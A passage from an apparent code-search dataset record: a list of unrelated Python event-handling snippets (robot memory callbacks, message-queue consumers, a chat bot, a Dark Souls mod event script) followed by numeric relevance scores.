PORT_ME, IP_ROBOT, PORT_ROBOT)\n\n proxy_memory = naoqi.ALProxy(\"ALMemory\", IP_ROBOT, PORT_ROBOT)\n\n # Register callback:\n def mycallback(key, value):\n print(\"qi callback: key={}, value={}\".format(key, value))\n sess = proxy_memory.session()\n mem = sess.service(\"ALMemory\")\n sub = mem.subscriber(\"FaceDetected\")\n sub.signal.connect(functools.partial(mycallback, \"FaceDetected\"))\n\n # Raise an event:\n proxy_memory.raiseEvent(\"FaceDetected\", str(datetime.datetime.now()))\n proxy_memory.raiseEvent(\"AnotherEvent\", str(datetime.datetime.now()))\n time.sleep(0.1) # give it some time to process", "async def event_handler(self, response):\n data = ujson.loads(response.data)\n if isinstance(data, dict):\n if data['event'] == 'subscribed':\n print('Subscribed to channel: {0}, for pair: {1}, on channel ID: {2}'.format(data['channel'], data['pair'], data['chanId']))\n self.channel_mapping[data['chanId']] = (data['channel'], data['pair'])\n elif data['event'] == 'info':\n print('Exchange: {0} Websocket version: {1}'.format(self.id, data['version']))\n elif isinstance(data, list):\n if isinstance(data[1], str):\n print('Heartbeat on channel {0}'.format(data[0]))\n else:\n # Published data, time stamp and send to appropriate queue\n timestamp = self.microseconds() / 1000\n datetime = self.iso8601(timestamp)\n if self.channel_mapping[data[0]][0] == 'book':\n pair_id = self.channel_mapping[data[0]][1]\n await self.queues['orderbooks'][pair_id].put((data, timestamp, datetime))", "def __call__(self, event, payload):\n logging.debug(\"Event: %s %s\" % (event, payload))\n\n # register new task\n if event == \"CRAB_Cmd_Mgr:NewTask\":\n self.newTaskRegistration(payload)\n elif event == \"KillTask\":\n taskUniqName, cmdRng = payload.split(':')\n self.killingRequestes[taskUniqName] = cmdRng\n # usual stuff\n elif event == \"TaskRegisterComponent:StartDebug\":\n logging.getLogger().setLevel(logging.DEBUG)\n elif event == \"TaskRegisterComponent:EndDebug\":\n logging.getLogger().setLevel(logging.INFO)\n elif event == \"TaskRegisterComponent:HeartBeat\":\n logging.info(\"HeartBeat: I'm alive \")\n self.ms.publish(\"TaskRegisterComponent:HeartBeat\",\"\",self.HeartBeatDelay)\n self.ms.commit()\n else:\n logging.info('Unknown message received %s + %s'%(event,payload))\n return True", "def test_listen_for_registers_listener(self):\n bus = event_bus._event_bus\n\n def event_listener(_):\n pass\n\n with event_bus.listen_for(Event, event_listener):\n self.assertEqual(len(bus._registration_id_map), 1)", "def handle_events(self, events):\n for event in events:\n event_type = event['type']\n if event_type == types.SO_CHANGE:\n for key in event['data']:\n self.data[key] = event['data'][key]\n self.on_change(key)\n\n elif event_type == types.SO_REMOVE:\n key = event['data']\n assert key in self.data, (key, self.data.keys())\n del self.data[key]\n self.on_delete(key)\n\n elif event_type == types.SO_SEND_MESSAGE:\n self.on_message(event['data'])\n else:\n assert False, event", "def _publish(self,e):\n # translate here....\n ev = self.__enum_event_map[int(e)]\n print ev\n # publish here....\n self.__qf.publish(event.Event(ev))\n print \"complete\"", "def event0():\n header(0, 0)\n end_if_client()\n\n if DEBUG.GET_MASTER_KEY:\n flag.disable(50004066)\n item.award_item_to_host_only(4073)\n if DEBUG.HAS_RUSTBONE:\n flag.enable(EVENT.HasBonerust)\n if DEBUG.SPEED_UP_PLAYER:\n chr.set_special_effect(CHR.Player, 2370)\n if DEBUG.GET_CHTHONIC_SPARK:\n flag.disable(50001510) # Thrall Spark drop flag.\n 
item.award_item_to_host_only(ITEMLOT.ThrallReward)\n\n for flag_id in (760, 762, 765):\n flag.disable(flag_id)\n\n # Display a message after an event flag is enabled (with optional delay).\n run_event_with_slot(260, 0, args=(11810000, 10010600, 0), arg_types='iif') # Arrival in Lordran.\n run_event_with_slot(260, 1, args=(257, 10010610, 0), arg_types='iif') # Rite of Kindling.\n run_event_with_slot(260, 2, args=(EVENT.ObtainedChthonicSpark, 10010620, 0), arg_types='iif') # Chthonic Spark.\n run_event_with_slot(260, 3, args=(11412053, 10010621, 0), arg_types='iif') # Chthonic Spark stolen.\n run_event_with_slot(260, 4, args=(EVENT.LordvesselReceived, TEXT.LordvesselWarpUnlocked, 0), arg_types='iif')\n\n # Assorted events (see documentation). Mostly monitoring states. 710 monitors warping ability.\n for event_id in (761, 763, 290, 701, 702, 717, 718,\n 706, 740, 750, 752, 757, 758, 759,\n 754, 770, 772, 730, 731, 766, 710):\n run_event(event_id)\n\n # Monitor Lord Souls/Shard possession. Doesn't include Dark Remnant.\n run_event_with_slot(711, 0, args=(2500, 711)) # Gravelord Nito\n run_event_with_slot(711, 1, args=(2501, 712)) # Bed of Chaos\n run_event_with_slot(711, 2, args=(2502, 713)) # Four Kings\n run_event_with_slot(711, 3, args=(2503, 714)) # Seath the Scaleless\n\n run_event(715) # Player has Gwyn's Soul.\n run_event(716) # Player has Sunlight Spear.\n run_event(11512000) # (New) Player has been given Lordvessel.\n\n # Monitor Estus upgrade level.\n for slot, args in enumerate(zip(range(202, 215, 2), range(203, 216, 2))):\n run_event_with_slot(8131, slot, args)\n\n run_event(819) # Monitor repair box sync.\n\n run_event(2540) # (New) Ring of the Embraced punishes you if removed.\n run_event(2541) # (New) Ring of Temptation activates after 15 seconds.\n run_event(2542) # (New) Ring of Temptation takes your souls and breaks if you die.\n run_event(2543) # (New) Ring of the Evil Eye kill reward.\n run_event(2544) # (New) Twilight Ring effect starts and ends.\n run_event(2545) # (New) Twilight Ring effect waxes and wanes.\n run_event(2546) # (New) Bond to Beyond has a 5% chance of giving one soft humanity.\n run_event(2547) # (New) Contract and heal Bonerust (11302050)\n run_event(2548) # (New) Kills heal with Nahr Alma pact.\n run_event(2549) # (New) Ring of Condemnation recharges.\n run_event(11502020) # (New) Lithic Witness event.\n run_event(11502023) # (New) Beyond Witness event.\n\n # (New) Toggles availability of full bonfire menu based on Spark possession.\n run_event(11512005)\n\n # BOSS DROPS\n\n for slot, args in enumerate((\n # boss_dead_flag, immediate_item_lot, delayed_item_lot_1, delayed_item_lot_2\n (2, ITEMLOT.AriamisReward, 9020, 9030),\n (11010901, ITEMLOT.TaurusDemonReward, 9000, 9030),\n (11010904, ITEMLOT.ProfaneImageReward, 0, 0),\n (3, ITEMLOT.BellGargoylesReward, 9020, 0),\n (4, ITEMLOT.CrossbreedPriscillaReward, 9020, 0),\n (11200900, ITEMLOT.MoonlightButterflyReward, 9000, 0),\n (11200901, ITEMLOT.GravestalkersReward, 9030, 0),\n (5, ITEMLOT.AbyssArtoriasReward, 9000, 0),\n (6, ITEMLOT.PinwheelReward, 9000, 9030),\n (7, ITEMLOT.NitoReward, 9000, 9030),\n (9, ITEMLOT.QuelaagReward, 9020, 0),\n (11410902, ITEMLOT.CeaselessDischargeReward, 9000, 9030),\n (11412055, ITEMLOT.JeremiahReward, 9000, 0),\n (11410901, ITEMLOT.CentipedeDemonReward, 9000, 9030),\n (10, ITEMLOT.BedOfChaosReward, 9000, 9030),\n (11, ITEMLOT.SensGolemReward, 9000, 0),\n (11510900, ITEMLOT.GwyndolinReward, 0, 0),\n (11510901, ITEMLOT.JareelReward, 0, 0),\n (11510902, ITEMLOT.OrnsteinReward, 
9000, 0),\n (11510903, ITEMLOT.SmoughReward, 9000, 0),\n (11012012, ITEMLOT.ThrallReward, 0, 0),\n (13, ITEMLOT.FourKingsReward, 9010, 0),\n (14, ITEMLOT.SeathReward, 9000, 0),\n (11800001, ITEMLOT.GwynCinderReward, 0, 0),\n (16, ITEMLOT.AsylumDemonReward, 9000, 0),\n (11810901, ITEMLOT.StrayDemonReward, 9000, 9030),\n (11810902, ITEMLOT.AsylumTyrantReward, 9000, 9030),\n (11210000, ITEMLOT.SanctuaryGuardianReward, 9000, 0),\n (11210001, ITEMLOT.ArtoriasReward, 0, 0),\n (11212006, ITEMLOT.ManusReward, 9040, 0),\n (11210004, ITEMLOT.KalameetReward, 0, 0),\n (11212008, ITEMLOT.TwilightVagrantReward, 0, 0),\n (11512201, ITEMLOT.GwynLightReward, 0, 0),\n )):\n run_event_with_slot(1950, slot, args)\n\n # (New) Monitor Velka's pact. (1910 is enabled in Firelink Shrine.)\n run_event(1915) # Monitor pact breaking.\n run_event(1916) # Monitor Seath punishment.\n run_event(1917) # Monitor Nito punishment.\n run_event(1918) # Monitor Jeremiah punishment.\n\n # (New) Monitor challenge pacts.\n run_event(1900) # Kremmel.\n run_event(1901) # Zandroe.\n run_event(1902) # Caitha.\n run_event(1903) # Nahr Alma.\n run_event(1904) # Quella permanent Abyss warp.\n run_event(1905) # Monitor Etched Ring removal and curse player (non-Quella).\n run_event(1906) # Quella ring removal.\n\n run_event(1920) # (New) Return Xanthous Crown on next load when dropped. Uses 1921.\n run_event(1922) # (New) Warp to special Painted World event when Soul of Ariamis is consumed.\n run_event(1923) # (New) Award Chaos Fire Whip when Soul of the Exile is consumed.\n run_event(1924) # (New) Skeletons in Tomb go back to rest when you load a map other than Tomb or Catacombs.\n run_event(1925) # (New) Manages Dark Ember damage boost stacks.\n run_event(11025400) # (New) Manages Ruinous Hand kill charge-up.\n run_event(1926) # (New) Trigger Ruinous Hand explosion at full charge.\n run_event(1927) # (New) HP penalty for being hollow (25%).\n\n run_event(2510) # (New) Sable Rune control.\n run_event(2511) # (New) Lustrous Rune control.\n run_event(2512) # (New) Wraith Rune control.\n run_event(2513) # (New) Scintilla Rune control.\n run_event(2514) # (New) Omphalic Rune control.\n run_event(2515) # (New) Omphalic Rune kill counter and death trigger.\n run_event(2516) # (New) Pale White Rune control.\n run_event(2517) # (New) Reaper's Rune trigger.\n run_event(2518) # (New) Reaper's Rune kill counter.\n run_event(2519) # (New) Rhythm Rune triggers.\n run_event(2520) # (New) Ransackers Rune trigger.\n # (New) Ransackers Rune item map checks. (2521-2530) (No Kiln, no Asylum.)\n for slot, (block, area) in enumerate(((10, 0), (10, 1), (10, 2), (11, 0), (12, 0), (12, 1),\n (13, 0), (13, 1), (13, 2), (14, 0), (14, 1), (15, 0),\n (15, 1), (16, 0), (17, 0))):\n args = tuple([block, area] + [50000 + 100 * slot + 10 * i for i in range(0, 10)])\n run_event_with_slot(2521, slot, args=args, arg_types='BBiiiiiiiiii')\n \n # Activate Runes.\n for slot, rune in enumerate(range(9)):\n run_event_with_slot(2600, slot, args=(90 + rune, 11025350 + rune))\n\n # Monitor availability of bonfire options\n for slot, args in enumerate(zip(range(2600, 2610), range(250, 260))):\n run_event_with_slot(250, slot, args)\n\n # Remove Embers from inventory when given to blacksmiths. 
These are removed aggressively and repeatedly!\n for slot_args in zip((0, 1, 2, 6, 7, 8, 9, 10, 12),\n zip((350, 351, 352, 356, 357, 358, 359, 360, 362),\n (800, 801, 802, 806, 807, 808, 809, 810, 812))):\n run_event_with_slot(350, slot_args[0], slot_args[1])\n\n # (NEW) Chthonic Spark version of the above event, which also requires Vamos to be alive.\n run_event_with_slot(363, 0, args=(363, 813))\n\n # Monitor reinforcement material possession.\n for slot, args in enumerate(zip(range(1000, 1131, 10), range(780, 794))):\n run_event_with_slot(780, slot, args)\n\n # Monitor covenant membership.\n for slot, args in enumerate(zip(range(0, 10), range(850, 860))):\n run_event_with_slot(870, slot, args)\n\n # Covenant joining events. (args = trigger_flag, player_animation, rotation_target, looping_animation)\n for slot, args in enumerate(zip(range(840, 850), (7905, 7905, 7905, 7905, 7898, 7905, 7905, 7913, 7905, 7905),\n (6370, 6072, 6080, 6001, 10000, 6340, 6341, 10000, 6380, 1400700),\n (-1, -1, -1, -1, 7896, -1, -1, 7911, -1, -1))):\n run_event_with_slot(840, slot, args)\n\n # Monitor NG+ level. Uses flags 690 (NG) to 705 (NG+15).\n run_event_with_slot(690, 0, args=(600, 4, 16, 1175))\n\n run_event(719) # Monitor possession of any spell.\n run_event(720) # Monitor possession of any pyromancy.\n\n # Monitor whether shops are sold out.\n # NOTE: This all suggests that shopkeeper flags are in the 7000 range for their area. Avoid!\n run_event(721) # Big Hat Logan in Duke's Archives.\n run_event(722) # Quelana of Izalith.\n run_event(723) # Griggs at Firelink Shrine.\n run_event(724) # Male Undead Merchant. (I don't think this does anything.)\n run_event(725) # Checks if you've bought 2+ items from Logan in Duke's Archives.\n run_event(726) # Checks if you've bought 2+ items from Ingward in New Londo Ruins.\n run_event(727) # Checks flags in Ash Lake / Great Hollow. Not sure who this is.\n\n run_event(745) # Cut Shiva questline I think.\n run_event(818) # Black Eye Orb quivers in Anor Londo.\n run_event(810) # Monitor possession of Lautrec's Black Eye Orb.\n # Lautrec frees himself from New Londo if both item flags below are enabled.\n run_event_with_slot(812, 0, args=(51400150,)) # Monitor possession of Blighttown Fire Keeper Soul (moved).\n run_event_with_slot(812, 1, args=(51010050,)) # Monitor possession of Undead Parish Humanity (still on altar).\n run_event(822) # Disable flag 830 half a second after leaving the Kiln. (Frampt pickup.)\n run_event(823) # Disable flag 831 half a second after leaving the Kiln. (Kaathe pickup.)\n\n # (New) Monitor dead NPCs for Twilight Vagrant. 
Counts friendly or hollow death, unless noted otherwise.\n for slot, npc_dead_flag in enumerate((\n 1073, # 2051: Oscar (friendly) (must be enabled in tutorial)\n 1097, # 2052: Big Hat Logan\n 1115, # 2053: Griggs\n 1005, # 2054: Solaire (note this won't trigger if he is killed when Hollow, unlike other NPCs)\n 1254, # 2055: Laurentius\n 1462, # 2056: Crestfallen Warrior\n 1575, # 2057: Lautrec\n 1604, # 2058: Shiva\n 1628, # 2059: Patches\n 1899, # 2060: Havel\n 1864, # 2061: Ciaran (in Oolacile and/or with Nito)\n 1823, # 2062: Hawkeye Gough\n 5, # 2063: Artorias (in Darkroot)\n )):\n run_event_with_slot(11212050, slot + 1, args=(npc_dead_flag,))\n\n # (New) Monitor Tomb of the Giants presence to send Giant Skeletons back to sleep.\n run_event(11310201)\n\n # (New) Monitor picking up Chthonic Spark for the first time to display message.\n run_event(11512004)\n\n # EVENT REWARDS (covenants, storylines)\n\n run_event_with_slot(910, 0, args=(11400591, 1280)) # Joining Chaos Servants.\n run_event_with_slot(911, 0, args=(11010591, 1000, 1), arg_types='iiB')\n run_event_with_slot(911, 1, args=(11510590, 1010, 1), arg_types='iiB')\n run_event_with_slot(911, 2, args=(11700591, 1020, 1), arg_types='iiB')\n run_event_with_slot(911, 3, args=(11000591, 1030, 1), arg_types='iiB')\n run_event_with_slot(911, 4, args=(11400590, 1040, 1), arg_types='iiB')\n run_event_with_slot(911, 5, args=(11410594, 1050, 1), arg_types='iiB')\n run_event_with_slot(911, 6, args=(11020594, 1060, 1), arg_types='iiB')\n run_event_with_slot(911, 7, args=(11020595, 1070, 1), arg_types='iiB')\n run_event_with_slot(911, 8, args=(11810590, 1082, 1), arg_types='iiB')\n run_event_with_slot(911, 9, args=(11810591, 1080, 1), arg_types='iiB')\n run_event_with_slot(911, 10, args=(11510592, 1090, 1), arg_types='iiB')\n run_event_with_slot(911, 11, args=(11600592, 1100, 1), arg_types='iiB')\n run_event_with_slot(911, 12, args=(11020602, 1110, 1), arg_types='iiB')\n run_event_with_slot(911, 13, args=(11010594, 1120, 1), arg_types='iiB')\n run_event_with_slot(911, 14, args=(11010595, 1130, 1), arg_types='iiB')\n run_event_with_slot(911, 15, args=(11020599, 1140, 1), arg_types='iiB')\n run_event_with_slot(911, 16, args=(11020607, 1150, 1), arg_types='iiB')\n run_event_with_slot(911, 17, args=(11200592, 1160, 1), arg_types='iiB')\n run_event_with_slot(911, 18, args=(11200593, 1170, 1), arg_types='iiB')\n run_event_with_slot(911, 19, args=(11200594, 1180, 1), arg_types='iiB')\n run_event_with_slot(911, 20, args=(11300590, 1190, 1), arg_types='iiB')\n run_event_with_slot(911, 21, args=(11300591, 1200, 1), arg_types='iiB')\n run_event_with_slot(911, 22, args=(11310590, 1210, 1), arg_types='iiB')\n run_event_with_slot(911, 23, args=(11310592, 1220, 1), arg_types='iiB')\n run_event_with_slot(911, 24, args=(11310593, 1230, 1), arg_types='iiB')\n run_event_with_slot(911, 25, args=(11310594, 1240, 1), arg_types='iiB')\n run_event_with_slot(911, 26, args=(11320590, 1250, 1), arg_types='iiB')\n run_event_with_slot(911, 27, args=(11320581, 1260, 1), arg_types='iiB')\n run_event_with_slot(911, 28, args=(11320593, 1270, 1), arg_types='iiB')\n run_event_with_slot(911, 29, args=(11400592, 1290, 1), arg_types='iiB')\n run_event_with_slot(911, 30, args=(11400594, 1300, 1), arg_types='iiB')\n run_event_with_slot(911, 31, args=(11400596, 1310, 1), arg_types='iiB')\n run_event_with_slot(911, 32, args=(11400597, 1320, 1), arg_types='iiB')\n run_event_with_slot(911, 33, args=(11400598, 1330, 1), arg_types='iiB')\n run_event_with_slot(911, 34, args=(11400599, 
1340, 1), arg_types='iiB')\n run_event_with_slot(911, 35, args=(11510595, 1350, 1), arg_types='iiB')\n run_event_with_slot(911, 36, args=(11510596, 1360, 1), arg_types='iiB')\n run_event_with_slot(911, 37, args=(11510597, 1370, 1), arg_types='iiB')\n run_event_with_slot(911, 38, args=(11600594, 1380, 1), arg_types='iiB')\n run_event_with_slot(911, 39, args=(11600595, 1390, 1), arg_types='iiB')\n run_event_with_slot(911, 40, args=(11600596, 1400, 1), arg_types='iiB')\n run_event_with_slot(911, 41, args=(11010598, 1410, 0), arg_types='iiB')\n run_event_with_slot(911, 42, args=(11210590, 1500, 1), arg_types='iiB')\n run_event_with_slot(911, 43, args=(11210593, 1510, 1), arg_types='iiB')\n run_event_with_slot(911, 44, args=(11210594, 1520, 1), arg_types='iiB')\n run_event_with_slot(911, 45, args=(11600580, 1401, 1), arg_types='iiB')\n run_event_with_slot(911, 46, args=(11600581, 1402, 1), arg_types='iiB')\n run_event_with_slot(911, 47, args=(11600582, 1403, 1), arg_types='iiB')\n run_event_with_slot(911, 48, args=(11600583, 1404, 1), arg_types='iiB')\n run_event_with_slot(890, 0, args=(11310580, 1221, 1), arg_types='iiB') # 911 ran out of slots (up against 960).\n run_event_with_slot(890, 1, args=(11510580, 1361, 1), arg_types='iiB')\n run_event_with_slot(890, 2, args=(11510581, 1371, 1), arg_types='iiB')\n run_event_with_slot(890, 3, args=(11320592, 1261, 1), arg_types='iiB')\n\n # DIRECT NPC DEATH REWARDS (960-969)\n run_event_with_slot(960, 0, args=(1315, 6180, 1100)) # Ingward (Key to the Seal)\n run_event_with_slot(960, 1, args=(1402, 6230, 6230)) # Undead Merchant (Orange Soapstone)\n # run_event_with_slot(960, 2, args=(1198, 6080, 1140)) # Petrus (Lift Chamber Key) (dies before killing Rhea)\n # run_event_with_slot(960, 3, args=(1196, 6080, 1140)) # Petrus (Lift Chamber Key) (dies after killing Rhea)\n\n # NEW GAME PLUS: Bring covenant ranks up to date, and prevent gifts from being re-awarded.\n run_event_with_slot(8200, 0, args=(3, 5500, 50000120, 11010594))\n run_event_with_slot(8200, 1, args=(3, 5510, 50000130, 11010595))\n run_event_with_slot(8200, 2, args=(2, 103, 50000160, 11200592))\n run_event_with_slot(8200, 3, args=(3, 240, 50000170, 11200593))\n run_event_with_slot(8200, 4, args=(2, 124, 50000180, 11200594))\n run_event_with_slot(8200, 5, args=(0, 453000, 50000220, 11310592))\n run_event_with_slot(8200, 6, args=(3, 5100, 50000225, 11310580))\n run_event_with_slot(8200, 7, args=(3, 5110, 50000230, 11310593))\n run_event_with_slot(8200, 8, args=(3, 114, 50000265, 11320581))\n run_event_with_slot(8200, 9, args=(3, 377, 50000260, 11320592))\n run_event_with_slot(8200, 10, args=(3, 378, 50000270, 11320593))\n run_event_with_slot(8200, 11, args=(3, 4500, 50000310, 11400596))\n run_event_with_slot(8200, 12, args=(3, 4520, 50000320, 11400597))\n run_event_with_slot(8200, 13, args=(3, 4510, 50000330, 11400598))\n run_event_with_slot(8200, 14, args=(2, 130, 50000350, 11510595))\n run_event_with_slot(8200, 15, args=(3, 113, 50000360, 11510596))\n run_event_with_slot(8200, 16, args=(2, 102, 50000365, 11510580))\n run_event_with_slot(8200, 17, args=(3, 5910, 50000370, 11510597))\n run_event_with_slot(8200, 18, args=(0, 1366000, 50000375, 11510581))\n run_event_with_slot(8200, 19, args=(0, 904000, 50000380, 11600594))\n run_event_with_slot(8200, 20, args=(3, 102, 50000390, 11600595))\n run_event_with_slot(8200, 21, args=(0, 210000, 50000400, 11600596))\n run_event_with_slot(8200, 22, args=(1, 40000, 50000410, 11600580))\n run_event_with_slot(8200, 23, args=(1, 41000, 50000420, 11600581))\n 
run_event_with_slot(8200, 24, args=(1, 42000, 50000430, 11600582))\n run_event_with_slot(8200, 25, args=(1, 43000, 50000440, 11600583))\n\n # Same as above, but for other special rewards.\n run_event_with_slot(8300, 0, args=(ItemType.good, 100, 50000000)) # White Sign Soapstone\n run_event_with_slot(8300, 1, args=(ItemType.good, 101, 51100330)) # Red Sign Soapstone\n run_event_with_slot(8300, 2, args=(ItemType.good, 102, 50000390)) # Red Eye Orb\n run_event_with_slot(8300, 3, args=(ItemType.good, 106, 11017020)) # Orange Guidance Soapstone\n run_event_with_slot(8300, 4, args=(ItemType.good, 108, 11607020)) # Book of the Guilty\n run_event_with_slot(8300, 5, args=(ItemType.good, 112, 11407080)) # Servant Roster\n run_event_with_slot(8300, 6, args=(ItemType.good, 2508, 11007010)) # Unknown - seems unused.\n run_event_with_slot(8300, 7, args=(ItemType.good, 2508, 11007010)) # Unknown - seems unused.\n run_event_with_slot(8300, 8, args=(ItemType.good, 2508, 11007010)) # Unknown - seems unused.\n run_event_with_slot(8300, 9, args=(ItemType.good, 2508, 11007010)) # Unknown - seems unused.\n\n # NOTE: Flag 8310 onwards is used for NPC humanity registration.\n\n # Same as above for DLC items.\n run_event_with_slot(8090, 0, args=(ItemType.good, 510, 11217010))\n run_event_with_slot(8090, 1, args=(ItemType.good, 511, 11217020))\n run_event_with_slot(8090, 2, args=(ItemType.good, 512, 11217030))\n run_event_with_slot(8090, 3, args=(ItemType.good, 513, 11217040))\n run_event_with_slot(8090, 4, args=(ItemType.good, 514, 11217050))\n\n # (New) Same as above, but for Runes and other new items.\n run_event_with_slot(11022100, 0, args=(ItemType.good, 900, 51010020))\n run_event_with_slot(11022100, 1, args=(ItemType.good, 901, 51510690))\n run_event_with_slot(11022100, 2, args=(ItemType.good, 902, 51200120))\n run_event_with_slot(11022100, 3, args=(ItemType.good, 903, 51410030))\n run_event_with_slot(11022100, 4, args=(ItemType.good, 904, 51810080))\n run_event_with_slot(11022100, 5, args=(ItemType.good, 905, 51700020))\n run_event_with_slot(11022100, 6, args=(ItemType.good, 906, 51300220))\n run_event_with_slot(11022100, 7, args=(ItemType.good, 907, 51300221))\n run_event_with_slot(11022100, 8, args=(ItemType.good, 908, 51210290))\n run_event_with_slot(11022100, 9, args=(ItemType.ring, 133, 50000650)) # Velka gift (Ring of Condemnation)\n run_event_with_slot(11022100, 10, args=(ItemType.ring, 124, 50001780)) # Twilight Vagrant drop (Twilight Ring)\n run_event_with_slot(11022100, 11, args=(ItemType.ring, 105, 50004900)) # Lithic Bond\n run_event_with_slot(11022100, 12, args=(ItemType.ring, 107, 50004910)) # Serous Bond\n run_event_with_slot(11022100, 13, args=(ItemType.ring, 106, 50004920)) # Empyrean Bond\n run_event_with_slot(11022100, 14, args=(ItemType.ring, 108, 50004930)) # Bond to Beyond\n # Leaving slots 11022100-11022119 dedicated to this.\n\n # (NEW) Remove some additional new items in NG+.\n run_event_with_slot(11022120, 0, args=(ItemType.ring, 152)) # Ashen Ring\n run_event_with_slot(11022120, 1, args=(ItemType.ring, 151)) # Gwynevere's Ring\n run_event_with_slot(11022120, 2, args=(ItemType.good, 220)) # Silver Pendant\n run_event_with_slot(11022120, 3, args=(ItemType.armor, 294000)) # Xanthous Crown (true)\n run_event_with_slot(11022120, 4, args=(ItemType.ring, 149)) # Darkmoon Seance Ring", "def run(self, event, db):\n pass", "def on_event():\n\n event = request.get_json()\n \n token_status, token_text = validate_token()\n\n if token_status != 0:\n return json.jsonify({'text': token_text})\n\n 
if event['type'] == 'ADDED_TO_SPACE' and event['space']['type'] == 'ROOM':\n text = 'Thanks for adding me to \"%s\"! For help type @bot help' % event['space']['displayName']\n \n elif event['type'] == 'MESSAGE':\n\n room_name = event['space']['name'].split('/')[1]\n commands = ['list', 'add', 'remove', 'help']\n\n try:\n param = event['message']['text'].split()[1:][0]\n except:\n text = _help()\n return json.jsonify({'text': text})\n\n if param in commands:\n\n if param == 'list':\n text = _list(room_name)\n\n elif param == 'add':\n text = _add(event, room_name)\n\n elif param == 'remove':\n text = _remove(event, room_name)\n\n elif param == 'help':\n text = _help()\n return json.jsonify({'text': text})\n \n else:\n text = send_msg(event, room_name)\n\n else:\n return\n \n return json.jsonify({'text': text})", "def get_events(self):\n raise NotImplementedError", "def get_events(self):\n raise NotImplementedError", "def outReadEvent(self, readBuffer):\r\n pass", "def send_event(event: dict):\n\n eventbridge.put_events(Entries=[event])", "def handle_event(self, event):\n raise NotImplementedError(\n \"handle_event() is not implemented for base class.\")", "def test_process_packet_event(self):\n pkt = {'type': 'event',\n 'name': 'woot',\n 'endpoint': '',\n 'args': []}\n self.ns.process_packet(pkt)\n assert not self.environ['socketio'].error.called\n\n # processing an event packet with message id and ack\n pkt = {'type': 'event',\n 'id': 1,\n 'ack': 'data',\n 'name': 'tobi',\n 'endpoint': '',\n 'args': []}\n self.ns.process_packet(pkt)\n assert not self.environ['socketio'].error.called", "def customEvent(self, e):\n data = e.data()\n \n ## HOST INFO\n \n if data.find('host up') == 0:\n self.emit(PYSIGNAL('host_up'), (data.split(' ')[2],))\n\n elif data.find('host down') == 0:\n self.emit(PYSIGNAL('host_down'), (data.split(' ')[2],))\n\n elif data.find('add group') == 0:\n self.emit(PYSIGNAL('add_group'), (int(data.split(' ')[2]),))\n\n elif data.find('remove group') == 0:\n self.emit(PYSIGNAL('remove_group'), (int(data.split(' ')[2]),))\n\n elif data.find('group beat') == 0:\n self.emit(PYSIGNAL('group_beat'), (data[11:],))\n \n ## PKAUDIOD\n \n elif data.find('midi') == 0:\n l = data.split(' ')[1:]\n data = [int(l[0]),int(l[1]),int(l[2]),float(l[3])]\n self.emit(PYSIGNAL('midi'), (data,))\n \n elif data.find('sample:starting') == 0:\n l = data.split(' ')\n self.emit(PYSIGNAL('local_sample_starting'), (int(l[1]),))", "async def createEvent(self, event: Event) -> None:", "def receive(channel):\n\n def callback(ch, method, properties, body):\n\n event = json.loads(body)\n event_info = event['event_info']\n event_type = event['type']\n success = True\n logger.info(f\"Received event {event}\")\n\n try:\n # Events coming from account microservice\n\n if event_type == USER_CREATED_EVENT:\n\n add_and_publish_event(\n GlobalPreferencesCreatedEvent(event['uuid'], event_info['id'], dict(\n vehicles=['bus', 'subway', 'train', 'tram', 'car', 'walking', 'bike', 'taxi',\n 'enjoy', 'mobike'],\n personal_vehicles=[])),\n PREFERENCES_CREATED)\n\n elif event_type == USER_DELETED_EVENT:\n\n add_and_publish_event(GlobalPreferencesDeletedEvent(event['uuid'], event_info['id']), PREFERENCES_DELETED)\n\n # Events generated in this microservice\n\n elif event_type == PREFERENCES_CREATED_EVENT:\n add_global_preferences(GlobalPreferences(**event_info))\n\n elif event_type == PREFERENCES_MODIFIED_EVENT:\n modify_global_preferences(GlobalPreferences(**event_info))\n\n elif event_type == PREFERENCES_DELETED_EVENT:\n 
delete_global_preferences(GlobalPreferences(**event_info))\n\n elif event_type == CALENDAR_CREATED_EVENT:\n add_calendar(Calendar(**event_info))\n\n elif event_type == CALENDAR_MODIFIED_EVENT:\n modify_calendar(Calendar(**event_info))\n\n elif event_type == CALENDAR_DELETED_EVENT:\n delete_calendar(Calendar(**event_info))\n\n except SQLAlchemyError as e:\n\n # to deal with at least once delivery of rabbitmq and the create methods which are not idempotent\n if (event_type == USER_CREATED_EVENT or event_type == PREFERENCES_CREATED_EVENT or event_type == CALENDAR_CREATED_EVENT) \\\n and method.redelivered and isinstance(e, IntegrityError):\n logger.info(f'Not processed redelivered event {event}')\n\n else:\n logger.info(f\"Couldn't process event {event}\")\n success = False\n\n finally:\n if success: # ack only if the event has been processed\n ch.basic_ack(delivery_tag=method.delivery_tag)\n logger.info(f\"Processed and acked event {event}\")\n\n # channel.basic_qos(prefetch_count=1)\n channel.basic_consume(callback,\n queue=CALENDAR_QUEUE)\n\n logger.info(\"Started listening to events\")\n channel.start_consuming()", "def event(self, event: object):\n\n self._event = event", "def event(self, event):\n\n self._event = event", "def event(self, event):\n\n self._event = event", "def event(self, event):\n\n self._event = event", "def events(bot, event, *args):\n yield from _printEventList(bot, event)", "def __call__(self, trigger, type, event):", "def on_eod(self, oid, body):\n\t\tself._pbar.update(self._pbar.total - self._pbar.n)\n\t\tself._pbar.close()\n\n\t\tself.basic_publish('dereg-feed', sender=self.id)\n\t\tself.basic_publish('dereg-exe', sender=self.id)\n\n\t\tself._stop()" ]
[ "0.6813228", "0.67946595", "0.6717539", "0.6711378", "0.6636821", "0.6603972", "0.6455036", "0.6390352", "0.63873655", "0.6378598", "0.6359191", "0.63422745", "0.6334636", "0.6332409", "0.6296997", "0.6277028", "0.627466", "0.62578577", "0.62556595", "0.6215644", "0.61823285", "0.6163456", "0.61622155", "0.6142611", "0.6137002", "0.6130823", "0.61188704", "0.61083007", "0.6106413", "0.6084834", "0.6076044", "0.60588664", "0.6044624", "0.60399663", "0.600434", "0.59961045", "0.5982097", "0.59768236", "0.5972545", "0.5959743", "0.5954097", "0.5926999", "0.59227115", "0.5910245", "0.59065974", "0.5902059", "0.5884645", "0.5877099", "0.58684534", "0.5846234", "0.5840908", "0.5840696", "0.5836571", "0.58335567", "0.5830606", "0.58305186", "0.5816279", "0.58105206", "0.58097774", "0.57954854", "0.5795149", "0.5777568", "0.57766694", "0.5764292", "0.57642406", "0.5759171", "0.57529175", "0.57426745", "0.57398844", "0.57387406", "0.5736854", "0.5735867", "0.57334524", "0.5727241", "0.5722079", "0.57109094", "0.5705907", "0.57056403", "0.5700089", "0.5699856", 